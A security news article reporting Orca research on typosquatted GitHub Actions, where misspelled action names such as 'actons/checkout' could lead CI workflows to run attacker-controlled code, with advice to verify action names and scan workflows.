"If developers make a typo in their GitHub Action that matches a typosquatter's action, applications could be made to run malicious code without the developer even realizing," security researcher Ofir Yakobi said in a report shared with The Hacker News.

The attack is possible because anyone can publish a GitHub Action by creating a GitHub account with a temporary email account. Given that actions run within the context of a user's repository, a malicious action could be exploited to tamper with the source code, steal secrets, and use it to deliver malware.

All that the technique involves is for the attacker to create organizations and repositories with names that closely resemble popular or widely-used GitHub Actions.

If a user makes inadvertent spelling errors when setting up a GitHub action for their project and that misspelled version has already been created by the adversary, then the user's workflow will run the malicious action as opposed to the intended one.

"Imagine an action that exfiltrates sensitive information or modifies code to introduce subtle bugs or backdoors, potentially affecting all future builds and deployments," Yakobi said.

"In fact, a compromised action can even leverage your GitHub credentials to push malicious changes to other repositories within your organization, amplifying the damage across multiple projects."

Orca said that a search on GitHub revealed as many as 198 files that invoke "action/checkout" or "actons/checkout" instead of "actions/checkout" (note the missing "s" and "i"), putting all those projects at risk.

This form of typosquatting is appealing to threat actors because it's a low-cost, high-impact attack that could result in powerful software supply chain compromises, affecting several downstream customers all at once.

Users are advised to double-check actions and their names to ensure they are referencing the correct GitHub organization, stick to actions from trusted sources, and periodically scan their CI/CD workflows for typosquatting issues.

"This experiment highlights how easy it is for attackers to exploit typosquatting in GitHub Actions and the importance of vigilance and best practices in preventing such attacks," Yakobi said.

"The actual problem is even more concerning because here we are only highlighting what happens in public repositories. The impact on private repositories, where the same typos could be leading to serious security breaches, remains unknown."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#web